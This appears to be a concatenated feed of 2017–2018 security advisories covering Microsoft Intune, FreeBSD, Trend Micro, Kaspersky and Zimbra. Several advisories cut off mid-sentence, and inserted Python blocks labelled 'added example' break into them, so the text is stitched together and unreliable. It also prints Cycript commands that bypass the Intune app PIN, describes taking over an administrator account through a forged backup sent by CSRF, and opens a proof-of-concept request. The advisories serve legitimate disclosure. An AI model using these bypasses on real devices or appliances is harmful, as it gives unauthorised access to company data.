Define a mobile management strategy that fits the needs of your organization. Apply flexible mobile device and app management controls that let employees work with the devices and apps they choose while protecting your company information. [1]

Compass Security discovered a design weakness in Microsoft Intune's iOS Keychain management. This allows users to access company data even after the device has been unenrolled.

Technical Description
---------------------
If a user's device, which is enrolled with their company's MDM, is unenrolled, their Office access tokens are not removed from the iOS Keychain. Furthermore, the respective tokens are not invalidated on the server side. Therefore, if the user reinstalls Office on their device after unenrollment, they may again obtain full access to the company's files.

Workaround / Fix:
-----------------
This issue can be fixed by invalidating the user's access token on the server and client side. In addition, the Keychain items could also be encrypted with a key stored in the app's data directory. Since this key is removed with the data directory on uninstallation of the app, this renders the Keychain entry useless.

Timeline:
---------
2017-08-22 Discovery by Stephan Sekula
2017-09-17 Initial vendor notification
2017-09-18 Initial vendor response
2017-10-04 Asking vendor for update
2017-10-04 Vendor replies that engineers are working on reproducing the issue
2017-11-01 Asking vendor for an update
2017-11-02 Vendor replies - They are waiting for a partner team to respond on the case.
2018-01-08 Asking vendor for update - No response
2018-02-12 Asking vendor for update - No response
2018-03-19 Public disclosure

References:
-----------
[1] https://www.microsoft.com/en-us/cloud-platform/microsoft-intune
FreeBSD Security Advisory FreeBSD-SA-18:03.speculative_execution
=============================================================================
FreeBSD-SA-18:03.speculative_execution                      Security Advisory
                                                          The FreeBSD Project

Topic:          Speculative Execution Vulnerabilities

Category:       core
Module:         kernel
Announced:      2018-03-14
Credits:        Jann Horn (Google Project Zero); Werner Haas, Thomas
                Prescher (Cyberus Technology); Daniel Gruss, Moritz Lipp,
                Stefan Mangard, Michael Schwarz (Graz University of
                Technology); Paul Kocher; Daniel Genkin (University of
                Pennsylvania and University of Maryland), Mike Hamburg
                (Rambus); Yuval Yarom (University of Adelaide and Data61)
Affects:        All supported versions of FreeBSD.
Corrected:      2018-02-17 18:00:01 UTC (stable/11, 11.1-STABLE)
                2018-03-14 04:00:00 UTC (releng/11.1, 11.1-RELEASE-p8)
CVE Name:       CVE-2017-5715, CVE-2017-5754

Special Note:   Speculative execution vulnerability mitigation is a work in progress. This advisory addresses the most significant issues for FreeBSD 11.1 on amd64 CPUs. We expect to update this advisory to include 10.x for amd64 CPUs. Future FreeBSD releases will address this issue on i386 and other CPUs. freebsd-update will include changes on i386 as part of this update due to common code changes shared between amd64 and i386, however it contains no functional changes for i386 (in particular, it does not mitigate the issue on i386).

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

Many modern processors have implementation issues that allow unprivileged attackers to bypass user-kernel or inter-process memory access restrictions by exploiting speculative execution and shared resources (for example, caches).

II.  Problem Description

A number of issues relating to speculative execution were found last year and publicly announced January 3rd. Two of these, known as Meltdown and Spectre V2, are addressed here.

CVE-2017-5754 (Meltdown)
------------------------

This issue relies on an affected CPU speculatively executing instructions beyond a faulting instruction. When this happens, changes to architectural state are not committed, but observable changes may be left in micro-architectural state (for example, cache). This may be used to infer privileged data.

CVE-2017-5715 (Spectre V2)
--------------------------

Spectre V2 uses branch target injection to speculatively execute kernel code at an address under the control of an attacker.

III. Impact

An attacker may be able to read secret data from the kernel or from a process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility, followed by a reboot into the new kernel:

# freebsd-update fetch
# freebsd-update install
# shutdown -r now

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:03/speculative_execution-amd64-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:03/speculative_execution-amd64-11.patch.asc
# gpg --verify speculative_execution-amd64-11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

CVE-2017-5754 (Meltdown)
------------------------

The mitigation is known as Page Table Isolation (PTI). PTI largely separates kernel and user mode page tables, so that even during speculative execution most of the kernel's data is unmapped and not accessible.

A demonstration of the Meltdown vulnerability is available at https://github.com/dag-erling/meltdown. A positive result is definitive (that is, the vulnerability exists with certainty). A negative result indicates either that the CPU is not affected, or that the test is not capable of demonstr
FreeBSD Security Advisory FreeBSD-SA-18:01.ipsec [REVISED]
FreeBSD-SA-18:01.ipsec                             [REVISED] Security Advisory
                                                          The FreeBSD Project

Topic:          ipsec validation and use-after-free
Category:       core
Module:         ipsec
Announced:      2018-03-07
Credits:        Maxime Villard
Affects:        All supported versions of FreeBSD.
Corrected:      2018-02-24 13:04:02 UTC (stable/11, 11.1-STABLE)
                2018-03-07 05:53:35 UTC (releng/11.1, 11.1-RELEASE-p7)
                2018-03-07 16:55:15 UTC (stable/10, 10.4-STABLE)
                2018-03-07 17:16:41 UTC (releng/10.4, 10.4-RELEASE-p7)
                2018-03-07 17:16:41 UTC (releng/10.3, 10.3-RELEASE-p28)
CVE Name:       CVE-2018-6916

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit <URL:https://security.FreeBSD.org/>.

0.   Revision History

v1.0  2018-03-07  Initial release.
v1.1  2018-03-08  Correct patch for 10.x releases.

I.   Background

The IPsec suite of protocols provides network level security for IPv4 and IPv6
packets. FreeBSD includes software originally developed by the KAME project
which implements the various protocols that make up IPsec.

In IPsec, the IP Authentication Header (AH) is used to provide protection
against replay attacks and connectionless integrity and data origin
authentication for IP datagrams.

II.  Problem Description

Due to a lack of strict checking, an attacker from a trusted host can send a
specially constructed IP packet that may lead to a system crash.

Additionally, a use-after-free vulnerability in the AH handling code could
cause unpredictable results.

III. Impact

Access to out of bounds or freed mbuf data can lead to a kernel panic or other
unpredictable results.

IV.  Workaround

No workaround is available, but systems not using IPsec are not vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date, and reboot
the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can
be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

And reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

[*** v1.1 NOTE ***] If your 10.x sources were already patched using the
initially published advisory patches, you need to apply the
ipsec-10.rev1.patch. If you had not yet patched your 10.x sources, you need
only apply the ipsec-10.patch file. 11.1 sources were correct in the initial
release and do not need to be updated.

a) Download the relevant patch from the location below, and verify the detached
PGP signature using your PGP utility.

[FreeBSD 10.x system not patched with the original SA-18:01 patch]
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.patch.asc
# gpg --verify ipsec-10.patch.asc

[FreeBSD 10.x that had been patched with the original SA-18:01 patch]
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.rev1.patch
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.rev1.patch.asc
# gpg --verify ipsec-10.rev1.patch.asc

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-11.patch.asc
# gpg --verify ipsec-11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected
branch.

Branch/path                                                         Revision
- -------------------------------------------------------------------------
stable/10/                                                          r330609
releng/10.3/                                                        r330611
releng/10.4/                                                        r330611
stable/11/                                                          r329907
releng/11.1/                                                        r330566
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.f
FreeBSD Security Advisory FreeBSD-SA-18:01.ipsec
FreeBSD-SA-18:01.ipsec                                      Security Advisory
                                                          The FreeBSD Project

Topic:          ipsec validation and use-after-free
Category:       core
Module:         ipsec
Announced:      2018-03-07
Credits:        Maxime Villard
Affects:        All supported versions of FreeBSD.
Corrected:      2018-02-24 13:04:02 UTC (stable/11, 11.1-STABLE)
                2018-03-07 05:53:35 UTC (releng/11.1, 11.1-RELEASE-p7)
                2018-03-07 05:47:48 UTC (stable/10, 10.4-STABLE)
                2018-03-07 05:53:35 UTC (releng/10.4, 10.4-RELEASE-p6)
                2018-03-07 05:53:35 UTC (releng/10.3, 10.3-RELEASE-p27)
CVE Name:       CVE-2018-6916

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The IPsec suite of protocols provides network level security for IPv4 and IPv6
packets. FreeBSD includes software originally developed by the KAME project
which implements the various protocols that make up IPsec.

In IPsec, the IP Authentication Header (AH) is used to provide protection
against replay attacks and connectionless integrity and data origin
authentication for IP datagrams.

II.  Problem Description

Due to a lack of strict checking, an attacker from a trusted host can send a
specially constructed IP packet that may lead to a system crash.

Additionally, a use-after-free vulnerability in the AH handling code could
cause unpredictable results.

III. Impact

Access to out of bounds or freed mbuf data can lead to a kernel panic or other
unpredictable results.

IV.  Workaround

No workaround is available, but systems not using IPsec are not vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date, and reboot
the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can
be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

And reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the detached
PGP signature using your PGP utility.

[FreeBSD 10.x]
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.patch.asc
# gpg --verify ipsec-10.patch.asc

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-11.patch.asc
# gpg --verify ipsec-11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected
branch.

Branch/path                                                         Revision
- -------------------------------------------------------------------------
stable/10/                                                          r330565
releng/10.3/                                                        r330566
releng/10.4/                                                        r330566
stable/11/                                                          r329907
releng/11.1/                                                        r330566
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6916>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:01.ipsec.asc>
[CORE-2017-0006] Trend Micro Email Encryption Gateway Multiple Vulnerabilities
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Trend Micro Email Encryption Gateway Multiple Vulnerabilities

1. *Advisory Information*

Title: Trend Micro Email Encryption Gateway Multiple Vulnerabilities
Advisory ID: CORE-2017-0006
Advisory URL: http://www.coresecurity.com/advisories/trend-micro-email-encryption-gateway-multiple-vulnerabilities
Date published: 2018-02-21
Date of last update: 2018-02-21
Vendors contacted: Trend Micro
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Cleartext Transmission of Sensitive Information [CWE-319], External
Control of File Name or Path [CWE-73], Insufficient Verification of Data
Authenticity [CWE-345], External Control of File Name or Path [CWE-73], Missing
Authentication for Critical Function [CWE-306], Cross-Site Request Forgery
[CWE-352], Improper Restriction of XML External Entity Reference [CWE-611],
Improper Neutralization of Input During Web Page Generation ('Cross-site
Scripting') [CWE-79], Improper Neutralization of Input During Web Page
Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper
Neutralization of Special Elements used in an SQL Command [CWE-89], Improper
Neutralization of Special Elements used in an SQL Command [CWE-89], Improper
Neutralization of Special Elements used in an SQL Command [CWE-89]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-6219, CVE-2018-6220, CVE-2018-6221, CVE-2018-6222,
CVE-2018-6223, CVE-2018-6224, CVE-2018-6225, CVE-2018-6226, CVE-2018-6226,
CVE-2018-6227, CVE-2018-6228, CVE-2018-6229, CVE-2018-6230

3. *Vulnerability Description*

Trend Micro's website states that:[1]

"Encryption for Email Gateway is a Linux-based software solution providing the
ability to perform the encryption and decryption of email at the corporate
gateway, regardless of the email client, and the platform from which it
originated. The encryption and decryption of email on the TMEEG client is
controlled by a Policy Manager that enables an administrator to configure
policies based on various parameters, such as sender and recipient email
addresses, keywords, or PCI compliance. Encryption for Email Gateway presents
itself as an SMTP interface and delivers email out over an SMTP to configured
outbound MTAs. This enables easy integration with other email server-based
products, be them content scanners, mail servers, or archiving solutions."

Multiple vulnerabilities were found in the Trend Micro Email Encryption Gateway
web console that would allow a remote unauthenticated attacker to gain command
execution as root. We also present two additional vectors to achieve code
execution from a man-in-the-middle position.

4. *Vulnerable Packages*

. Trend Micro Email Encryption Gateway 5.5 (Build .00)

Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Trend Micro published the following Security Notes:

. https://success.trendmicro.com/solution/1119349-security-bulletin-trend-micro-email-encryption-gateway-5-5-multiple-vulnerabilities

6. *Credits*

These vulnerabilities were discovered and researched by Leandro Barragan and
Maximiliano Vidal from Core Security Consulting Services. The publication of
this advisory was coordinated by Alberto Solino from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Trend Micro Email Encryption Gateway includes a web console to perform
administrative tasks. Section 7.4 describes a vulnerability in this console
that can be exploited to gain command execution as root.

The vulnerable functionality is accessible only to authenticated users, but it
is possible to combine 7.4 with the vulnerability presented in section 7.5 to
bypass this restriction and therefore execute root commands from the
perspective of a remote unauthenticated attacker.

The application also uses an insecure update mechanism that allows an attacker
in a man-in-the-middle position to write arbitrary files and install arbitrary
RPM packages, leading to remote command execution as the root user.

Additional Web application vulnerabilities were found, including cross-site
request forgery (7.6), XML external entity injection (7.7), several cross-site
scripting vulnerabilities (7.8, 7.9, 7.10), and SQL injection vulnerabilities
(7.11, 7.12, 7.13).

7.1. *Insecure update via HTTP* [CVE-2018-6219]

Communication to the update servers is unencrypted. The following URL is
fetched when the application checks for updates:

/-
[Request #1]
http://downloads.privatepost.com/files/TMEEG/updates/data.html
-/

The product expects to retrieve a plain-text file with the following format:

/-
[Version Info]
[Installation RPM file name]
[Path to release notes]
-/

If a new update is found, then the RPM file is downloaded
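The two weaknesses in this update path are the cleartext transport (CWE-319) and the unvalidated file names the manifest hands to the installer (CWE-73). The checks below are an added example written for this advisory, not Trend Micro code: the three-line layout is taken from the advisory, while the TRUSTED_HOST value, the field patterns and the path policy are assumptions a hardened client would pin to its own deployment.

```python
"""Validate an update manifest before any file is fetched or written.

Added example, not Trend Micro code. The manifest layout (version, RPM file
name, release-notes path) follows the advisory; TRUSTED_HOST, the field
patterns and the path policy are assumptions for this example.
"""
from dataclasses import dataclass
from urllib.parse import urlparse
import posixpath
import re

# Assumed policy values. The advisory's real data.html URL used plain http://.
TRUSTED_HOST = "downloads.privatepost.com"
RPM_NAME_RE = re.compile(r"^[A-Za-z0-9._+-]+\.rpm$")
VERSION_RE = re.compile(r"^\d+(\.\d+)*$")


class ManifestError(ValueError):
    """Raised when the manifest or its origin fails a check."""


@dataclass(frozen=True)
class UpdateManifest:
    version: str
    rpm_name: str
    release_notes: str


def check_manifest_url(url: str) -> None:
    """Refuse cleartext transport and unexpected hosts (CWE-319)."""
    parts = urlparse(url)
    if parts.scheme != "https":
        raise ManifestError(f"update metadata must use https, got {parts.scheme!r}")
    if parts.hostname != TRUSTED_HOST:
        raise ManifestError(f"unexpected update host {parts.hostname!r}")


def parse_manifest(text: str) -> UpdateManifest:
    """Parse the three-line format, rejecting fields that could steer a file write (CWE-73)."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) != 3:
        raise ManifestError(f"expected 3 fields, got {len(lines)}")
    version, rpm_name, notes = lines
    if not VERSION_RE.match(version):
        raise ManifestError(f"malformed version {version!r}")
    # The RPM name must be a bare file name: no directory part, no traversal.
    if rpm_name != posixpath.basename(rpm_name) or not RPM_NAME_RE.match(rpm_name):
        raise ManifestError(f"rejecting RPM file name {rpm_name!r}")
    # Release notes must be a relative path that stays inside the updates tree.
    norm = posixpath.normpath(notes)
    if notes.startswith("/") or norm.startswith("..") or "\\" in notes:
        raise ManifestError(f"rejecting release-notes path {notes!r}")
    # Note: the format carries no digest or signature, so a passing manifest
    # still says nothing about the RPM's authenticity (CWE-345); the package
    # signature has to be verified separately before installation.
    return UpdateManifest(version, rpm_name, norm)


def url_is_acceptable(url: str) -> bool:
    try:
        check_manifest_url(url)
        return True
    except ManifestError:
        return False


def manifest_is_valid(text: str) -> bool:
    try:
        parse_manifest(text)
        return True
    except ManifestError:
        return False
```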
CSNC-2017-027 Microsoft Intune - App PIN Bypass
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
# Product:  Microsoft Intune [1]
# Vendor:   Microsoft
# CSNC ID:  CSNC-2017-027
# Subject:  App PIN Bypass
# Risk:     Medium
# Effect:   Locally exploitable
# Author:   Stephan Sekula <stephan.sek...@compass-security.com>
# Date:     31.08.2017
#

Introduction:
-------------
Define a mobile management strategy that fits the needs of your organization.
Apply flexible mobile device and app management controls that let employees
work with the devices and apps they choose while protecting your company
information. [1]

Compass Security discovered a design weakness in Microsoft Intune's app
protection. This weakness allows a malicious user who gets hold of an
employee's iOS device to access company data even without knowing the app PIN.

Technical Description:
----------------------
Microsoft Intune supports protection policies such as requiring a PIN to
access a managed app. In the current implementation, however, the app PIN is
used only to show and hide an overlay screen, restricting access to the files
at the UI level only. Therefore, if the device is jailbroken, a simple Cycript
script can be written to hide the overlay and use the UI to access all stored
files.

To bypass the PIN, one needs to find the app's process ID (PID):

# ps aux | grep OneDrive
mobile 2086 1.2 4.9 1287904 100480 ?? Ss 11:06AM 0:05.59 /var/containers/Bundle/Application/AE292B95-58D2-4ECE-B7DF-767F0679706C/OneDrive.app/OneDrive

Attach to the app's process using Cycript and list the current view's details:

# cycript -p 2086
cy# UIApp.keyWindow.recursiveDescription().toString()
; layer = > | > || [CUT BY COMPASS] |||| >

Now, the overlay window can be hidden:

cy# [#0x105088e00 setHidden: YES]

The above command causes the PIN request window to be hidden, hence granting
access to the files using the mobile app UI.

Workaround / Fix:
-----------------
The PIN protection mechanism should be revisited. One solution would be to
encrypt all documents using a key derived from the user's PIN, hence rendering
a simple Cycript bypass useless. Furthermore, the app should verify whether
the user's device is jailbroken, and if a jailbreak is detected, all managed
apps and their data should be wiped from the device.

Timeline:
---------
2017-08-22: Discovery by Stephan Sekula
2017-09-17: Initial vendor notification
2017-09-18: Initial vendor response
2017-10-04: Asking vendor for an update
2017-10-04: Vendor replies that engineers are working on reproducing the issue
2017-11-01: Asking vendor for an update
2017-11-02: Vendor replies that the root cause is a vulnerability in iOS. Case
            is marked as won't fix.
2018-02-13: Public disclosure

References:
-----------
[1] https://www.microsoft.com/en-us/cloud-platform/microsoft-intune
[CORE-2017-0010] - Kaspersky Secure Mail Gateway Multiple Vulnerabilities
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Kaspersky Secure Mail Gateway Multiple Vulnerabilities

1. *Advisory Information*

Title: Kaspersky Secure Mail Gateway Multiple Vulnerabilities
Advisory ID: CORE-2017-0010
Advisory URL: http://www.coresecurity.com/advisories/kaspersky-secure-mail-gateway-multiple-vulnerabilities
Date published: 2018-02-01
Date of last update: 2018-02-01
Vendors contacted: Kaspersky Lab
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Cross-Site Request Forgery [CWE-352], Improper Neutralization of Special
Elements in Output Used by a Downstream Component [CWE-74], Improper Privilege
Management [CWE-269], Improper Neutralization of Input During Web Page
Generation [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2,
CVE-pending-assignment-3, CVE-pending-assignment-4

3. *Vulnerability Description*

From Kaspersky Labs website:

Kaspersky Secure Mail Gateway [1] gives you a fully integrated email system;
mail security solution - including anti-spam, anti-malware, anti-phishing and
more - in a single virtual appliance. It's easy to install and manage - so you
save time on day-to-day mail and mail security tasks, while we deliver
award-winning security that helps you keep your business safe and boost user
productivity.

Multiple vulnerabilities were found in the Kaspersky Mail Gateway Web
Management Console. It is possible for a remote attacker to abuse these
vulnerabilities and gain command execution as root.

4. *Vulnerable Packages*

Kaspersky Secure Mail Gateway 1.1.0.379

Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Kaspersky Labs published the following advisory

. https://support.kaspersky.com/vulnerability.aspx?el=12430#010218

6. *Credits*

These vulnerabilities were discovered and researched by Leandro Barragan from
Core Security Consulting Services. The publication of this advisory was
coordinated by Alberto Solino from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Kaspersky Secure Mail Gateway is a virtual appliance designed to be deployed
inside the organization's network infrastructure. It comes bundled with a Web
Management Console to monitor the application status and manage its operation.

This Management Console provides no cross-site request forgery protection
site-wide, which could result in administrative account takeover as shown in
7.1. In addition, an attacker who manages to get access to the Web Console
could gain command execution as root (7.2) by injecting arbitrary content into
the appliance's Postfix configuration.

It is also possible to elevate privileges from kluser to root (7.3) by abusing
a setuid binary shipped with the appliance, which executes a script located on
an attacker-controlled location with root privileges.

Apart from this, a reflected cross-site scripting vulnerability (7.4) was found
which affects the Management Console.

7.1. *Cross-site Request Forgery leading to Administrative account takeover*
[CVE-pending-assignment-1]

There are no Anti-CSRF tokens in any forms on the Web interface. This would
allow an attacker to submit authenticated requests when an authenticated user
browses an attacker-controlled domain.

The "Import Application Settings" feature is particularly interesting because
it allows users to restore a backup file that overwrites the appliance's
configuration.

A settings backup file contains five zlib segments:

/-
$ binwalk KSMG_settings.kz

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------
16            0x10            Zlib compressed data, default compression
39            0x27            Zlib compressed data, default compression
2242          0x8C2           Zlib compressed data, default compression
2268          0x8DC           Zlib compressed data, default compression
3072          0xC00           Zlib compressed data, default compression
-/

The last segment is a compressed backup of /var/opt/kaspersky/klms/db/passwd,
which contains a list of usernames, passwords, and profiles, for example:

/-
# cat /var/opt/kaspersky/klms/db/passwd
Administrator:7{E{I'}Ap{RpY~t/V28\lZ&,FM&97s5`6f5e51bd7ade638785f5e7476351839e:admin
-/

An attacker can craft a backup file that contains its own passwd file, and then
submit it by abusing the CSRF vulnerability. The appliance then overwrites the
original passwd file, giving the attacker access to the Administrator account.

The following proof-of-concept request restores only account information in
order to avoid changing the appliance's current configuration. Please note that
the file contents were removed to make it more readable.

/-
POST /ksmg/cgi-bin/klwi?action=importSettings=CC3262C5 HTTP/1.1
Host: server
User-Ag
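The binwalk listing above only reports offsets; an import handler or an incident responder looking at an uploaded backup also needs the inflated payload of each segment to see which one carries the credential database. The carver below is an added example, not Kaspersky code; the sample blob it builds is constructed here (three segments instead of the appliance's five) so it runs offline.

```python
"""Carve and inflate the zlib streams inside a settings backup blob.

Added example, not Kaspersky code. The sample backup is constructed here so
the carver can run offline; its layout only mimics the advisory's listing.
"""
import zlib
from dataclasses import dataclass
from typing import Callable, List

# A zlib header is CMF 0x78 (deflate, 32K window) plus a FLG byte; 0x01, 0x9c
# and 0xda are the headers zlib emits for low, default and best compression.
ZLIB_MAGICS = (b"\x78\x01", b"\x78\x9c", b"\x78\xda")


@dataclass
class ZlibSegment:
    offset: int          # where the stream starts in the blob (binwalk's DECIMAL)
    compressed_len: int  # bytes consumed by the stream, Adler-32 trailer included
    data: bytes          # inflated payload


def carve_zlib_segments(blob: bytes) -> List[ZlibSegment]:
    """Return every complete, checksum-valid zlib stream found in blob."""
    segments: List[ZlibSegment] = []
    pos = 0
    while pos < len(blob) - 1:
        if blob[pos:pos + 2] not in ZLIB_MAGICS:
            pos += 1
            continue
        d = zlib.decompressobj()
        try:
            data = d.decompress(blob[pos:])
        except zlib.error:
            # Looked like a header but is not a deflate stream: keep scanning.
            pos += 1
            continue
        if not d.eof:
            # Truncated stream (no end-of-stream marker / trailer): skip it.
            pos += 1
            continue
        consumed = len(blob) - pos - len(d.unused_data)
        segments.append(ZlibSegment(pos, consumed, data))
        pos += consumed
    return segments


def find_segments(blob: bytes, predicate: Callable[[bytes], bool]) -> List[ZlibSegment]:
    """Select carved segments whose payload satisfies predicate (e.g. looks like passwd)."""
    return [s for s in carve_zlib_segments(blob) if predicate(s.data)]


def looks_like_passwd(data: bytes) -> bool:
    """Heuristic for the user:hash:profile lines shown in the advisory."""
    lines = [ln for ln in data.splitlines() if ln]
    return bool(lines) and all(ln.count(b":") >= 2 for ln in lines)


def build_sample_backup() -> bytes:
    """Constructed stand-in for KSMG_settings.kz: filler bytes around three streams."""
    passwd = b"Administrator:<hash-placeholder>:admin\n"  # constructed, not a real hash
    parts = [
        b"KSMG" + b"\x00" * 12,                 # 16-byte filler, first stream at 0x10
        zlib.compress(b"<settings/>"),          # default level -> 78 9c header
        b"\xff" * 7,
        zlib.compress(b"<policy/>", 1),         # level 1 -> 78 01 header
        b"\x00" * 5,
        zlib.compress(passwd, 9),               # level 9 -> 78 da header
    ]
    return b"".join(parts)
```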
CVE-2017-8802 Zimbra Collaboration Suite - Stored Cross-Site Scripting
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com
#
# CVE ID:   CVE-2017-8802
# Product:  Zimbra Collaboration Suite (ZCS) [1]
# Vendor:   Synacor Inc. [2]
# Subject:  Stored Cross-Site Scripting (XSS) Vulnerability
# Risk:     High
# Effect:   Exploitable by Anonymous Internet Adversaries
#           Triggered in the Context of an Authenticated Zimbra Email User
# Authors:  Damian Pfammatter (damian.pfammat...@compass-security.com)
#           Alessandro Zala (alessandro.z...@compass-security.com)
# Date:     January 10th 2018
#

Introduction:
-------------
The Zimbra Collaboration Suite (ZCS) is a collaborative software suite that
includes Email servers as well as Email clients. According to the product
website, more than 500 million people are currently using the Email
collaboration tool [1].

Security Analysts of Compass Security Schweiz AG [3] discovered a Stored
Cross-Site Scripting (XSS) vulnerability in the Zimbra Email web client,
potentially resulting in a number of different attack scenarios.

Affected Versions:
------------------
No confirmed information about all affected versions is available. Versions
prior to 8.8 GA Release are likely affected.

Technical Description:
----------------------
The Zimbra Email web client is affected by a Stored Cross-Site Scripting (XSS)
vulnerability. Remote attackers can target the vulnerability by sending an
Email with an XSS payload (e.g. JavaScript) in its body. In case the recipient
selects the email in the Zimbra client and accesses the "Show Snippet"
functionality using the "Q" shortcut, the XSS payload is executed in the
context of the recipient's Zimbra client. For example, through social
engineering, attackers could bring their victims to press "Q" while reading
the compromised email, triggering the payload.

Among other things, the malicious payload could compromise the confidentiality,
integrity and availability of the victim's emails. It could also be possible to
change Zimbra settings of the corresponding victim.

Hotfix:
-------
The corresponding patch has been released in version 8.8.0 Beta2 [4]
(Bug #107925). The patch is part of public release 8.8 GA Release.

Timeline:
---------
2017-05-04: Vulnerability discovered
2017-05-05: Initial vendor notification
2017-05-05: Vendor confirmed security issue
2017-05-05: MITRE reserved CVE-2017-8802 for the issue
2017-12-12: Vendor released security fix & guidance to its customers
2018-01-10: Public disclosure

References:
-----------
[1] https://www.zimbra.com/
[2] https://www.synacor.com/
[3] https://www.compass-security.com/research/advisories/
[4] https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
FreeBSD Security Advisory FreeBSD-SA-17:12.openssl
FreeBSD-SA-17:12.openssl                                    Security Advisory
                                                          The FreeBSD Project

Topic:          OpenSSL multiple vulnerabilities
Category:       contrib
Module:         openssl
Announced:      2017-12-09
Affects:        All supported versions of FreeBSD.
Corrected:      2017-12-07 18:04:48 UTC (stable/11, 11.1-STABLE)
                2017-12-09 03:44:26 UTC (releng/11.1, 11.1-RELEASE-p6)
                2017-12-09 03:41:31 UTC (stable/10, 10.4-STABLE)
                2017-12-09 03:45:23 UTC (releng/10.4, 10.4-RELEASE-p5)
                2017-12-09 03:45:23 UTC (releng/10.3, 10.3-RELEASE-p26)
CVE Name:       CVE-2017-3737, CVE-2017-3738

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a
collaborative effort to develop a robust, commercial-grade, full-featured Open
Source toolkit for the Transport Layer Security (TLS) and Secure Sockets Layer
(SSL) protocols. It is also a full-strength general purpose cryptography
library.

II.  Problem Description

Invoking SSL_read()/SSL_write() while in an error state causes data to be
passed without being decrypted/encrypted directly from the SSL/TLS record
layer. In order to exploit this issue an application bug would have to be
present that resulted in a call to SSL_read()/SSL_write() being issued after
having already received a fatal error. [CVE-2017-3737]

There is an overflow bug in the x86_64 Montgomery multiplication procedure used
